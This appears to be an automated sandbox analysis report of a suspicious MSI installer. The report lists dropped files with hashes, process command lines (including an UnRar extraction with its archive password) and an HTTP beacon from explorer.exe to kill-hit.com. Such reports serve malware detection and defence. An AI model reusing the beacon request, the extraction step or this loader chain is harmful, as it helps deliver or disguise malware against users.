                                                          Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [

                                                          C:\Windows\Temp\~DF1D9D8ADBFF966233.TMP

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):512
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3::
                                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                          Malicious:false
                                                          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Windows\Temp\~DF332EECB87C39C218.TMP

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):512
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3::
                                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                          Malicious:false
                                                          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Windows\Temp\~DF40631DED820C65EF.TMP

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):32768
                                                          Entropy (8bit):0.0716018731360741
                                                          Encrypted:false
                                                          SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKOaucLPT3NMlXgVky6lit/:2F0i8n0itFzDHFaTz7NMBit/
                                                          MD5:FDA652D3FE91949698C60F0D659C9483
                                                          SHA1:FC8406265C7458399982C84D3882E59AE690B34B
                                                          SHA-256:0E1E59A506474B2050530F0347C0E35F8C209545BBC3F3D5367874F309C20402
                                                          SHA-512:B054EEB741D6409BC001F82DB9F5CB831DBD61EF5CE9F265E2F8D274470D7C322F021E64C6B590B6F7E2CBE943AABF545F9577166B052B4229A573BEF15D7B51
                                                          Malicious:false
                                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Windows\Temp\~DF71CFF521B3AB9040.TMP

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):1.574504812419244
                                                          Encrypted:false
                                                          SSDEEP:48:Ny8PhUuRc06WXJSjT5qKnuAEbCyqSNhMUXgSUTESF:NdhU1JjTkKtwCB4Xgt
                                                          MD5:79F0D1E902CC9D5F62DA1B38C8C82288
                                                          SHA1:68510A9304ACACAC76C3079A4D4A11EE521B1AE9
                                                          SHA-256:08C3F01A544E90B78C789DF944D6FD91CDC6E46F3D3AB2A03C003772A75369D2
                                                          SHA-512:B517339AAEC4F1E38CBD6EB14AA08873C4625CCDA15510016554578B4C5225BC705C4591B16E3A614514F45988E7F0D22C435EA5973E7841C44248CD4708DCDF
                                                          Malicious:false
                                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Windows\Temp\~DF7AE9850C83F5AC3E.TMP

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):512
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3::
                                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                          Malicious:false
                                                          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Windows\Temp\~DF7F30108F3C46B021.TMP

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):512
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3::
                                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                          Malicious:false
                                                          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Windows\Temp\~DFA73039F2998E3FD4.TMP

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                          Category:dropped
                                                          Size (bytes):32768
                                                          Entropy (8bit):1.2609076298842805
                                                          Encrypted:false
                                                          SSDEEP:48:sVcuQI+CFXJFT5EEKnuAEbCyqSNhMUXgSUTESF:gccdTuEKtwCB4Xgt
                                                          MD5:818097BC96CF1A376FE84E17454C00D5
                                                          SHA1:3F6A59E2FF313F7AC286BD30A7712D89BBEA3BD4
                                                          SHA-256:33D1CE8A6908AC2EB3B21896A1C22C1C55F20CFCBD2774B84B0941EA7DA02CBD
                                                          SHA-512:79C66A41CAA3FA781CA85DACDBDE055D0578F6A10B3DCFC6C1E887EF2257495E91A84D7081B44457B372AFA983FBD1E85610F7B11D027086784C14941F4538B9
                                                          Malicious:false
                                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Windows\Temp\~DFA969DD5B00E89354.TMP

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):73728
                                                          Entropy (8bit):0.14128246009315829
                                                          Encrypted:false
                                                          SSDEEP:24:RzmFHTxkVipVkbk7AEVkyjCyqipVksVgwG0ZMU80U+2j:RSFHTASVAEbCyqSNhMUXUnj
                                                          MD5:74701B26289F94FC905E8D0A657BC906
                                                          SHA1:6AADFECA1B927EA8E2CE9EDB4E407DE6B47A95B7
                                                          SHA-256:1873E4E8D590A07CFD2CDF53600FDBD9174E4EABE34F307FA36D13B7A22872D7
                                                          SHA-512:CA0BE4E0BD88B569B353481ECBC0C7F99175DBD64FC152949D0213CE631CEC1A23B287A144DBD579BE7532ADBE4DB71E8F164A7FA6094C5C3B19A2031618C7C3
                                                          Malicious:false
                                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Windows\Temp\~DFB88E9E8B11C8E720.TMP

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                          Category:dropped
                                                          Size (bytes):32768
                                                          Entropy (8bit):1.2609076298842805
                                                          Encrypted:false
                                                          SSDEEP:48:sVcuQI+CFXJFT5EEKnuAEbCyqSNhMUXgSUTESF:gccdTuEKtwCB4Xgt
                                                          MD5:818097BC96CF1A376FE84E17454C00D5
                                                          SHA1:3F6A59E2FF313F7AC286BD30A7712D89BBEA3BD4
                                                          SHA-256:33D1CE8A6908AC2EB3B21896A1C22C1C55F20CFCBD2774B84B0941EA7DA02CBD
                                                          SHA-512:79C66A41CAA3FA781CA85DACDBDE055D0578F6A10B3DCFC6C1E887EF2257495E91A84D7081B44457B372AFA983FBD1E85610F7B11D027086784C14941F4538B9
                                                          Malicious:false
                                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Windows\Temp\~DFBA6962232DE9B02E.TMP

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                          Category:dropped
                                                          Size (bytes):32768
                                                          Entropy (8bit):1.2609076298842805
                                                          Encrypted:false
                                                          SSDEEP:48:sVcuQI+CFXJFT5EEKnuAEbCyqSNhMUXgSUTESF:gccdTuEKtwCB4Xgt
                                                          MD5:818097BC96CF1A376FE84E17454C00D5
                                                          SHA1:3F6A59E2FF313F7AC286BD30A7712D89BBEA3BD4
                                                          SHA-256:33D1CE8A6908AC2EB3B21896A1C22C1C55F20CFCBD2774B84B0941EA7DA02CBD
                                                          SHA-512:79C66A41CAA3FA781CA85DACDBDE055D0578F6A10B3DCFC6C1E887EF2257495E91A84D7081B44457B372AFA983FBD1E85610F7B11D027086784C14941F4538B9
                                                          Malicious:false
                                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Windows\Temp\~DFF458610D6A0F1767.TMP

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:data
                                                          Category:modified
                                                          Size (bytes):512
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3::
                                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                          Malicious:false
                                                          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Windows\Temp\~DFFF4F96D7FFB3814D.TMP

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):1.574504812419244
                                                          Encrypted:false
                                                          SSDEEP:48:Ny8PhUuRc06WXJSjT5qKnuAEbCyqSNhMUXgSUTESF:NdhU1JjTkKtwCB4Xgt
                                                          MD5:79F0D1E902CC9D5F62DA1B38C8C82288
                                                          SHA1:68510A9304ACACAC76C3079A4D4A11EE521B1AE9
                                                          SHA-256:08C3F01A544E90B78C789DF944D6FD91CDC6E46F3D3AB2A03C003772A75369D2
                                                          SHA-512:B517339AAEC4F1E38CBD6EB14AA08873C4625CCDA15510016554578B4C5225BC705C4591B16E3A614514F45988E7F0D22C435EA5973E7841C44248CD4708DCDF
                                                          Malicious:false
                                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          \Device\ConDrv

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\createdump.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):638
                                                          Entropy (8bit):4.751962275036146
                                                          Encrypted:false
                                                          SSDEEP:12:ku/L92WF4gx9l+jsPczo/CdaD0gwiSrlEX6OPkRVdoaQLeU4wv:ku/h5F4Bs0oCdalwisCkRVKVeU4wv
                                                          MD5:15CA959638E74EEC47E0830B90D0696E
                                                          SHA1:E836936738DCB6C551B6B76054F834CFB8CC53E5
                                                          SHA-256:57F2C730C98D62D6C84B693294F6191FD2BEC7D7563AD9963A96AE87ABEBF9EE
                                                          SHA-512:101390C5D2FA93162804B589376CF1E4A1A3DD4BDF4B6FE26D807AFC3FF80DA26EE3BAEB731D297A482165DE7CA48508D6EAA69A5509168E9CEF20B4A88A49FD
                                                          Malicious:false
                                                          Preview:[createdump] createdump [options] pid..-f, --name - dump path and file name. The default is '%TEMP%\dump.%p.dmp'. These specifiers are substituted with following values:.. %p PID of dumped process... %e The process executable filename... %h Hostname return by gethostname()... %t Time of dump, expressed as seconds since the Epoch, 1970-01-01 00:00:00 +0000 (UTC)...-n, --normal - create minidump...-h, --withheap - create minidump with heap (default)...-t, --triage - create triage minidump...-u, --full - create full core dump...-d, --diag - enable diagnostic messages...-v, --verbose - enable verbose diagnostic messages...

                                                          Static File Info

                                                          General

                                                          File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Security: 0, Code page: 1252, Revision Number: {DA5E0F10-2101-4D17-9C89-A01D7F5CF622}, Number of Words: 10, Subject: Joas App, Author: Barsoc Quite Sols, Name of Creating Application: Joas App, Template: x64;2057, Comments: This installer database contains the logic and data required to install Joas App., Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Tue Jan 14 17:29:51 2025, Last Saved Time/Date: Tue Jan 14 17:29:51 2025, Last Printed: Tue Jan 14 17:29:51 2025, Number of Pages: 450
                                                          Entropy (8bit):7.223374477574857
                                                          TrID:
                                                          • Windows SDK Setup Transform Script (63028/2) 88.73%
                                                          • Generic OLE2 / Multistream Compound File (8008/1) 11.27%
                                                          File name:K064a7Rfk7.msi
                                                          File size:59'426'257 bytes
                                                          MD5:32af5cfab7bb87beedb521de43837347
                                                          SHA1:2f128db2405dd0362ce55629816dc8bbe83c0478
                                                          SHA256:b582b290012af285192ffdecc87a30f3964dacb82e26025c558aa0f46f2ab6fe
                                                          SHA512:ca18c6552db2d1d1502c75d41d69dd91a4f76a42c9e6c0d912871b65f085ccaf772cebc0555d658e4da4caa48deef0b14a8e4d812c2461fd18661cea410be7e3
                                                          SSDEEP:1572864:7okVmrjV7eILsOTZGcaN51GnOY3v+4p3cO6Gs:87scu+Z3H2t
                                                          TLSH:B5D76C01B3FA4148F2F75E717EBA55A594BABD521B30C0EF1204A60E1B72BC25BB1763
                                                          File Content Preview:........................>............................................)..........~.......................................................w......................................................................................................................

                                                          File Icon

                                                          Icon Hash:2d2e3797b32b2b99

                                                          Network Behavior

                                                          Network Port Distribution

                                                          TCP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Jan 14, 2025 22:27:24.810416937 CET4977980192.168.2.6104.21.37.86
                                                          Jan 14, 2025 22:27:24.815386057 CET8049779104.21.37.86192.168.2.6
                                                          Jan 14, 2025 22:27:24.815460920 CET4977980192.168.2.6104.21.37.86
                                                          Jan 14, 2025 22:27:24.815798998 CET4977980192.168.2.6104.21.37.86
                                                          Jan 14, 2025 22:27:24.820635080 CET8049779104.21.37.86192.168.2.6
                                                          Jan 14, 2025 22:27:25.748977900 CET8049779104.21.37.86192.168.2.6
                                                          Jan 14, 2025 22:27:25.810372114 CET4977980192.168.2.6104.21.37.86
                                                          Jan 14, 2025 22:27:25.885545969 CET8049779104.21.37.86192.168.2.6
                                                          Jan 14, 2025 22:27:25.949815989 CET4977980192.168.2.6104.21.37.86
                                                          Jan 14, 2025 22:27:25.994204998 CET4977980192.168.2.6104.21.37.86

                                                          UDP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Jan 14, 2025 22:27:24.790677071 CET6335453192.168.2.61.1.1.1
                                                          Jan 14, 2025 22:27:24.803359032 CET53633541.1.1.1192.168.2.6

                                                          DNS Queries

                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Jan 14, 2025 22:27:24.790677071 CET192.168.2.61.1.1.10x8074Standard query (0)kill-hit.comA (IP address)IN (0x0001)false

                                                          DNS Answers

                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Jan 14, 2025 22:27:24.803359032 CET1.1.1.1192.168.2.60x8074No error (0)kill-hit.com104.21.37.86A (IP address)IN (0x0001)false
                                                          Jan 14, 2025 22:27:24.803359032 CET1.1.1.1192.168.2.60x8074No error (0)kill-hit.com172.67.206.78A (IP address)IN (0x0001)false

                                                          HTTP Request Dependency Graph

                                                          • kill-hit.com

                                                          HTTP Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.649779104.21.37.8680524C:\Windows\SysWOW64\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 14, 2025 22:27:24.815798998 CET176OUTGET /front.php?a=yrJh28ExgsVYO0Y&id=0 HTTP/1.1
                                                          Connection: Keep-Alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                          Host: kill-hit.com
                                                          Jan 14, 2025 22:27:25.748977900 CET887INHTTP/1.1 404 Not Found
                                                          Date: Tue, 14 Jan 2025 21:27:25 GMT
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1tExApGNYzAAe%2BXeFIaydJZgdXwrYVyTVXvU5%2FKFzlFeL%2B2u7M08AVPxEAw6uAx7uzWDHfCnheNt5rmUf2H4wIkK%2FhpltS0cTPPCT5mdMzKd5sSvJXluCzvdRL9CfjI%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 9020b5befc84ab2d-YYZ
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=14191&min_rtt=14191&rtt_var=7095&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=176&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 38 61 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: 8a<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                                          Jan 14, 2025 22:27:25.885545969 CET5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Statistics

                                                          CPU Usage

                                                          Click to jump to process

                                                          Memory Usage

                                                          Click to jump to process

                                                          High Level Behavior Distribution

                                                          Click to dive into process behavior distribution

                                                          Behavior

                                                          Click to jump to process

                                                          System Behavior

                                                          General

                                                          Target ID:0
                                                          Start time:16:27:06
                                                          Start date:14/01/2025
                                                          Path:C:\Windows\System32\msiexec.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\K064a7Rfk7.msi"
                                                          Imagebase:0x7ff6c1bd0000
                                                          File size:69'632 bytes
                                                          MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:2
                                                          Start time:16:27:06
                                                          Start date:14/01/2025
                                                          Path:C:\Windows\System32\msiexec.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\msiexec.exe /V
                                                          Imagebase:0x7ff6c1bd0000
                                                          File size:69'632 bytes
                                                          MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:false

                                                          General

                                                          Target ID:3
                                                          Start time:16:27:08
                                                          Start date:14/01/2025
                                                          Path:C:\Windows\SysWOW64\msiexec.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 6E85F61D79C141FA458D0DA7A80AAA4F
                                                          Imagebase:0xa10000
                                                          File size:59'904 bytes
                                                          MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:5
                                                          Start time:16:27:22
                                                          Start date:14/01/2025
                                                          Path:C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exe" x -p3809610121t -o+ "C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\iwhgjds.rar" "C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\"
                                                          Imagebase:0x7ff7aacb0000
                                                          File size:506'008 bytes
                                                          MD5 hash:98CCD44353F7BC5BAD1BC6BA9AE0CD68
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Antivirus matches:
                                                          • Detection: 0%, ReversingLabs
                                                          Reputation:low
                                                          Has exited:true

                                                          General

                                                          Target ID:6
                                                          Start time:16:27:22
                                                          Start date:14/01/2025
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:7
                                                          Start time:16:27:23
                                                          Start date:14/01/2025
                                                          Path:C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exe"
                                                          Imagebase:0x7ff71e740000
                                                          File size:35'656 bytes
                                                          MD5 hash:D3CAC4D7B35BACAE314F48C374452D71
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Antivirus matches:
                                                          • Detection: 0%, ReversingLabs
                                                          Reputation:moderate
                                                          Has exited:true

                                                          General

                                                          Target ID:8
                                                          Start time:16:27:23
                                                          Start date:14/01/2025
                                                          Path:C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\createdump.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\createdump.exe"
                                                          Imagebase:0x7ff7c76d0000
                                                          File size:57'488 bytes
                                                          MD5 hash:71F796B486C7FAF25B9B16233A7CE0CD
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Antivirus matches:
                                                          • Detection: 0%, ReversingLabs
                                                          Reputation:moderate
                                                          Has exited:true

                                                          General

                                                          Target ID:9
                                                          Start time:16:27:23
                                                          Start date:14/01/2025
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:10
                                                          Start time:16:27:23
                                                          Start date:14/01/2025
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:11
                                                          Start time:16:27:24
                                                          Start date:14/01/2025
                                                          Path:C:\Windows\SysWOW64\explorer.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\SysWOW64\explorer.exe explorer.exe
                                                          Imagebase:0xc00000
                                                          File size:4'514'184 bytes
                                                          MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          General

                                                          Target ID:14
                                                          Start time:16:27:24
                                                          Start date:14/01/2025
                                                          Path:C:\Windows\System32\WerFault.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\WerFault.exe -u -p 1836 -s 256
                                                          Imagebase:0x7ff6c43c0000
                                                          File size:570'736 bytes
                                                          MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Disassembly

                                                          Reset < >

                                                            Execution Graph

                                                            Execution Coverage:9.5%
                                                            Dynamic/Decrypted Code Coverage:0%
                                                            Signature Coverage:1.9%
                                                            Total number of Nodes:265
                                                            Total number of Limit Nodes:6
                                                            execution_graph 30344 7ff7aacf1af4 RtlUnwindEx __GSHandlerCheck_SEH __GSHandlerCheckCommon 30293 7ff7aacf0cf0 LocalFree 30345 7ff7aacf52ed 45 API calls 2 library calls 29994 7ff7aacba9e0 29995 7ff7aacbaa02 29994->29995 29996 7ff7aacbaa19 29995->29996 29997 7ff7aacbaabe 29995->29997 30005 7ff7aace53b4 CompareStringW 29996->30005 29997->29997 30004 7ff7aacbaa99 29997->30004 30008 7ff7aacb32dc 29997->30008 29999 7ff7aacbaa3f 30006 7ff7aace53f8 CompareStringW 29999->30006 30003 7ff7aacbaa6a 30007 7ff7aace53f8 CompareStringW 30003->30007 30005->29999 30006->30003 30007->30004 30009 7ff7aacb3322 30008->30009 30011 7ff7aacb1360 33 API calls BuildCatchObjectHelperInternal 30009->30011 30346 7ff7aacfc6e0 7 API calls 30347 7ff7aacf1ae0 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter __security_init_cookie 30273 7ff7aacc1015 SetConsoleCtrlHandler 30274 7ff7aad04c10 CloseHandle 30298 7ff7aacf9910 16 API calls 2 library calls 30299 7ff7aacfb910 15 API calls 30301 7ff7aacb2100 69 API calls 30321 7ff7aad06202 57 API calls Concurrency::cancel_current_task 30276 7ff7aad00800 52 API calls 5 library calls 30322 7ff7aacf1600 49 API calls 30350 7ff7aace26b0 GetCurrentProcess SetPriorityClass GetCurrentThread SetThreadPriority 30323 7ff7aad071b0 VariantClear 30278 7ff7aacc9ba0 67 API calls 30043 7ff7aacf6fa0 30044 7ff7aacf6fc6 GetModuleHandleW 30043->30044 30045 7ff7aacf7010 30043->30045 30044->30045 30049 7ff7aacf6fd3 30044->30049 30056 7ff7aacfc728 EnterCriticalSection 30045->30056 30047 7ff7aacfc788 fflush LeaveCriticalSection 30048 7ff7aacf70e4 30047->30048 30051 7ff7aacf70f0 30048->30051 30052 7ff7aacf710c 11 API calls 30048->30052 30049->30045 30057 7ff7aacf7158 GetModuleHandleExW 30049->30057 30050 7ff7aacf7094 30050->30047 30052->30051 30053 7ff7aacfb7f8 16 API calls 30053->30050 30055 7ff7aacf701a 30055->30050 30055->30053 30058 7ff7aacf7182 GetProcAddress 30057->30058 30059 7ff7aacf71a9 30057->30059 30058->30059 30060 7ff7aacf719c 30058->30060 30061 7ff7aacf71b3 FreeLibrary 30059->30061 30062 7ff7aacf71b9 30059->30062 30060->30059 